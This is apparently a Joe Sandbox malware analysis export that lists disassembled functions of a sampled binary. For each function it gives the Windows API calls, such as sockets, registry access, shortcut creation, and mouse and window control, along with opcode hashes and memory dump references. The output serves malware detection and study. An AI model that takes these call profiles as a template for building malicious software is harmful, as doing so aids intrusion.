                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadModuleString$Message
                                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                                              • API String ID: 4072794657-3128320259
                                                                                              • Opcode ID: 6270a53d5dff110deac3d841ce13fc915a67d341186a343832c7e4f60ba1f328
                                                                                              • Instruction ID: 87c14c9462a050e3b873c7576dec0a7b23685397e348fd9db0f676e04b3a59d5
                                                                                              • Opcode Fuzzy Hash: 6270a53d5dff110deac3d841ce13fc915a67d341186a343832c7e4f60ba1f328
                                                                                              • Instruction Fuzzy Hash: 21011DF690030CBFE711A7A49D89FFA776DDB08300F018595B74AE2141EA749E858B75
                                                                                              Function 00DE25BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00DE271D
                                                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00DE273E
                                                                                              • WSAGetLastError.WSOCK32 ref: 00DE274F
                                                                                              • htons.WSOCK32(?,?,?,?,?), ref: 00DE2838
                                                                                              • inet_ntoa.WSOCK32(?), ref: 00DE27E9
                                                                                                • Part of subcall function 00DC4277: _strlen.LIBCMT ref: 00DC4281
                                                                                                • Part of subcall function 00DE3B81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00DDF569), ref: 00DE3B9D
                                                                                              • _strlen.LIBCMT ref: 00DE2892
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                              • String ID:
                                                                                              • API String ID: 3203458085-0
                                                                                              • Opcode ID: ea48322ca7f6cc94e58ada9cd0caab13e76c7500a8248cc2726b7e8b6c1fde40
                                                                                              • Instruction ID: deb2c2fd965a7beac6867c0a248ebe39358fdecd12d48af6d5c2cf5e4aadb308
                                                                                              • Opcode Fuzzy Hash: ea48322ca7f6cc94e58ada9cd0caab13e76c7500a8248cc2726b7e8b6c1fde40
                                                                                              • Instruction Fuzzy Hash: 3EB1C175604340AFD314EF25C895E3A7BA9EF84318F58854CF49A8B2A2DB31ED45CBB1
                                                                                              Function 00D90547 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __allrem.LIBCMT ref: 00D9044A
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D90466
                                                                                              • __allrem.LIBCMT ref: 00D9047D
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D9049B
                                                                                              • __allrem.LIBCMT ref: 00D904B2
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D904D0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                              • String ID:
                                                                                              • API String ID: 1992179935-0
                                                                                              • Opcode ID: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                                                                                              • Instruction ID: e225dcc0b29a2265b14b04af66b04ae6f9167535075b7ce436e36353e6fa65d1
                                                                                              • Opcode Fuzzy Hash: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                                                                                              • Instruction Fuzzy Hash: 64810672600706AFDF20AE6DEC81B6A7BE8EF45724F24412EF651D7691E770D9008BB0
                                                                                              Function 00D9658E Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D88669,00D88669,?,?,?,00D967DF,00000001,00000001,8BE85006), ref: 00D965E8
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D967DF,00000001,00000001,8BE85006,?,?,?), ref: 00D9666E
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D96768
                                                                                              • __freea.LIBCMT ref: 00D96775
                                                                                                • Part of subcall function 00D93BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D86A99,?,0000015D,?,?,?,?,00D885D0,000000FF,00000000,?,?), ref: 00D93BE2
                                                                                              • __freea.LIBCMT ref: 00D9677E
                                                                                              • __freea.LIBCMT ref: 00D967A3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1414292761-0
                                                                                              • Opcode ID: 3f374cf5a5aab0d5caccec41e65830366171d6c975c1c46cdf04dc65b9a905d5
                                                                                              • Instruction ID: e4945bde2690ec7f9656c841a9647d2828945d6f50d362c4839b4593b6f3b765
                                                                                              • Opcode Fuzzy Hash: 3f374cf5a5aab0d5caccec41e65830366171d6c975c1c46cdf04dc65b9a905d5
                                                                                              • Instruction Fuzzy Hash: 8651CF72600216ABEF259FA4CC81EBF77AAEB44B54B294669FC04D7150EB74DC40C7B0
                                                                                              Function 00DEC53A Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D6B25F: _wcslen.LIBCMT ref: 00D6B269
                                                                                                • Part of subcall function 00DED2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DEC00D,?,?), ref: 00DED314
                                                                                                • Part of subcall function 00DED2F7: _wcslen.LIBCMT ref: 00DED350
                                                                                                • Part of subcall function 00DED2F7: _wcslen.LIBCMT ref: 00DED3C7
                                                                                                • Part of subcall function 00DED2F7: _wcslen.LIBCMT ref: 00DED3FD
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DEC629
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DEC684
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00DEC6C9
                                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00DEC6F8
                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00DEC752
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00DEC75E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                              • String ID:
                                                                                              • API String ID: 1120388591-0
                                                                                              • Opcode ID: d32a3241dfb46ffba8e24f4e8f80622a94aa2201b2b5a856529024ed0250fa75
                                                                                              • Instruction ID: 526f4b32d82eabf2250ee1693bdf3bc157ee616fd54c68259a9174b47a17b852
                                                                                              • Opcode Fuzzy Hash: d32a3241dfb46ffba8e24f4e8f80622a94aa2201b2b5a856529024ed0250fa75
                                                                                              • Instruction Fuzzy Hash: D4819071118381AFD714EF24C885E2ABBE5FF84308F18955CF4958B2A2DB31ED46CBA1
                                                                                              Function 00DC003D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(00000035), ref: 00DC0049
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00DC00F0
                                                                                              • VariantCopy.OLEAUT32(00DC02F4,00000000), ref: 00DC0119
                                                                                              • VariantClear.OLEAUT32(00DC02F4), ref: 00DC013D
                                                                                              • VariantCopy.OLEAUT32(00DC02F4,00000000), ref: 00DC0141
                                                                                              • VariantClear.OLEAUT32(?), ref: 00DC014B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearCopy$AllocInitString
                                                                                              • String ID:
                                                                                              • API String ID: 3859894641-0
                                                                                              • Opcode ID: c4ef97ed5bd11c65215ddccfeb3ca303780258ce6f6e5fb1ed7060c9b945d1a2
                                                                                              • Instruction ID: 3fc499cfe2685f67424246a4bef7a4e7fcb8d7bd98b283f86efb9be4e262c951
                                                                                              • Opcode Fuzzy Hash: c4ef97ed5bd11c65215ddccfeb3ca303780258ce6f6e5fb1ed7060c9b945d1a2
                                                                                              • Instruction Fuzzy Hash: 2C51E635640312EBCF20AB649885F29BBA9EF05310B14944FE905DF296EA709C44CBB5
                                                                                              Function 00DD6DE8 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00DD6E36
                                                                                              • CoInitialize.OLE32(00000000), ref: 00DD6F93
                                                                                              • CoCreateInstance.OLE32(00E00CC4,00000000,00000001,00E00B34,?), ref: 00DD6FAA
                                                                                              • CoUninitialize.OLE32 ref: 00DD722E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                              • String ID: .lnk
                                                                                              • API String ID: 886957087-24824748
                                                                                              • Opcode ID: d42854ab4aa704a4dc8a838e7bd1d2d0c2c404671d7468ad9576d8f1477be0f1
                                                                                              • Instruction ID: d81a4c8ef9843f886a02b0768636daba6fdd62faf806e32317600b4e5a680b20
                                                                                              • Opcode Fuzzy Hash: d42854ab4aa704a4dc8a838e7bd1d2d0c2c404671d7468ad9576d8f1477be0f1
                                                                                              • Instruction Fuzzy Hash: 8FD14771508341AFC304EF64C881E6BB7E8EF98718F04495EF5958B2A1EB71ED45CBA2
                                                                                              Function 00DF8B3A Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00DBFB8F,00000000,?,?,00000000,?,00DA39BC,00000004,00000000,00000000), ref: 00DF8BAB
                                                                                              • EnableWindow.USER32(?,00000000), ref: 00DF8BD1
                                                                                              • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00DF8C30
                                                                                              • ShowWindow.USER32(?,00000004), ref: 00DF8C44
                                                                                              • EnableWindow.USER32(?,00000001), ref: 00DF8C6A
                                                                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00DF8C8E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 642888154-0
                                                                                              • Opcode ID: 6ff6ea2ccfba76e22284e6bd46b6a1ffbbc523a43b1a8c72e1b05ef053007b35
                                                                                              • Instruction ID: a08789d0bd974f181af6cc86a7aea4d93c7cacb525aab71f60b78b3c3e8b2883
                                                                                              • Opcode Fuzzy Hash: 6ff6ea2ccfba76e22284e6bd46b6a1ffbbc523a43b1a8c72e1b05ef053007b35
                                                                                              • Instruction Fuzzy Hash: 7C41837460124CEFDB15CF14D889BB57BE1FB45304F1A8169E7489F2A2CB31A845DB72
                                                                                              Function 00DE2C37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32(?,?,00000000), ref: 00DE2C45
                                                                                                • Part of subcall function 00DDEE49: GetWindowRect.USER32(?,?), ref: 00DDEE61
                                                                                              • GetDesktopWindow.USER32 ref: 00DE2C6F
                                                                                              • GetWindowRect.USER32(00000000), ref: 00DE2C76
                                                                                              • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00DE2CB2
                                                                                              • GetCursorPos.USER32(?), ref: 00DE2CDE
                                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00DE2D3C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                              • String ID:
                                                                                              • API String ID: 2387181109-0
                                                                                              • Opcode ID: 105f14d6f846eeab76b5116b6e77954e13deff02fa0e12b8610839680fa3ce6c
                                                                                              • Instruction ID: 330b94fbdcdad930171433aa4c4160a51ca7fad68066631cf5fe3ca101fe2857
                                                                                              • Opcode Fuzzy Hash: 105f14d6f846eeab76b5116b6e77954e13deff02fa0e12b8610839680fa3ce6c
                                                                                              • Instruction Fuzzy Hash: C431DE72504356ABD720EF15C845FAEB7AAFBC4314F14091AF489D7280CB30EA08CBA2
                                                                                              Function 00DD6178 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D6557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D65558,?,?,00DA4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00D6559E
                                                                                              • _wcslen.LIBCMT ref: 00DD61D5
                                                                                              • CoInitialize.OLE32(00000000), ref: 00DD62EF
                                                                                              • CoCreateInstance.OLE32(00E00CC4,00000000,00000001,00E00B34,?), ref: 00DD6308
                                                                                              • CoUninitialize.OLE32 ref: 00DD6326
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                              • String ID: .lnk
                                                                                              • API String ID: 3172280962-24824748
                                                                                              • Opcode ID: af3bfcd94fd7c3d74b3f69f7c69f4aa4462446e28c17252b466040c3eeac41c6
                                                                                              • Instruction ID: e685bd9eb6045514c904e3c0db6005c185ce20d130ab9d5adeab3f83ffb108e2
                                                                                              • Opcode Fuzzy Hash: af3bfcd94fd7c3d74b3f69f7c69f4aa4462446e28c17252b466040c3eeac41c6
                                                                                              • Instruction Fuzzy Hash: 26D134756083119FC714DF24C484A2ABBE5FF89714F18895EF8869B361DB32EC45CBA2
                                                                                              Function 00DC2104 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00DC210F
                                                                                              • UnloadUserProfile.USERENV(?,?), ref: 00DC211B
                                                                                              • CloseHandle.KERNEL32(?), ref: 00DC2124
                                                                                              • CloseHandle.KERNEL32(?), ref: 00DC212C
                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00DC2135
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00DC213C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                              • String ID:
                                                                                              • API String ID: 146765662-0
                                                                                              • Opcode ID: aa228b9bbec36f6ac89f928699f9590624e298fc98137223be23c04b045a2dca
                                                                                              • Instruction ID: ea9fdbbff13ee4ac81a5097054c516675eb8021e87b77dc8435d2d6ca377c776
                                                                                              • Opcode Fuzzy Hash: aa228b9bbec36f6ac89f928699f9590624e298fc98137223be23c04b045a2dca
                                                                                              • Instruction Fuzzy Hash: 69E0E576004301BBDB012FA1ED0CD1ABF7BFF59322B108220F225C2270CB329420DB60
                                                                                              Function 00DCCD90 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D64154: _wcslen.LIBCMT ref: 00D64159
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DCCEAE
                                                                                              • _wcslen.LIBCMT ref: 00DCCEF5
                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DCCF5C
                                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00DCCF8A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$Info_wcslen$Default
                                                                                              • String ID: 0
                                                                                              • API String ID: 1227352736-4108050209
                                                                                              • Opcode ID: 02bec9fa1b5b34937fd0e80b949227b856b6ef0e2357f14524f34dc682b30fcf
                                                                                              • Instruction ID: c03998add804368c99b527f740054768a0e713097387d46675d04c18c10b7459
                                                                                              • Opcode Fuzzy Hash: 02bec9fa1b5b34937fd0e80b949227b856b6ef0e2357f14524f34dc682b30fcf
                                                                                              • Instruction Fuzzy Hash: 0951A0716253029BD714DF28C845F6BBBE9EF8A314F081A2DFA99D7290D760C944C772
                                                                                              Function 00DF46DB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DF4794
                                                                                              • IsMenu.USER32(?), ref: 00DF47A9
                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DF47F1
                                                                                              • DrawMenuBar.USER32 ref: 00DF4804
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$DrawInfoInsert
                                                                                              • String ID: 0
                                                                                              • API String ID: 3076010158-4108050209
                                                                                              • Opcode ID: 9065532aafc1132dfa18d6bf358abb884cca6b194bab34e5b651595f20573874
                                                                                              • Instruction ID: 0567cbc4d7188d8d0a8c2691fb76c82f6e4d0c9f85103668fbda5766e1bea12c
                                                                                              • Opcode Fuzzy Hash: 9065532aafc1132dfa18d6bf358abb884cca6b194bab34e5b651595f20573874
                                                                                              • Instruction Fuzzy Hash: B9412574A0124DAFDB20DF64D884ABBBBB9FF45354F098129EA45AB350C730ED54CBA0
                                                                                              Function 00DC2672 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D6B25F: _wcslen.LIBCMT ref: 00D6B269
                                                                                                • Part of subcall function 00DC4536: GetClassNameW.USER32(?,?,000000FF), ref: 00DC4559
                                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00DC26F6
                                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00DC2709
                                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00DC2739
                                                                                                • Part of subcall function 00D684B7: _wcslen.LIBCMT ref: 00D684CA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$_wcslen$ClassName
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 2081771294-1403004172
                                                                                              • Opcode ID: b15f23a6db15962d9f0ecb614da3b4b762128632ffc73df2c1609bc69defd633
                                                                                              • Instruction ID: f4916490c373c94b48c6633c0b82b2a223fbc3a101c5167246ef01bfe0046057
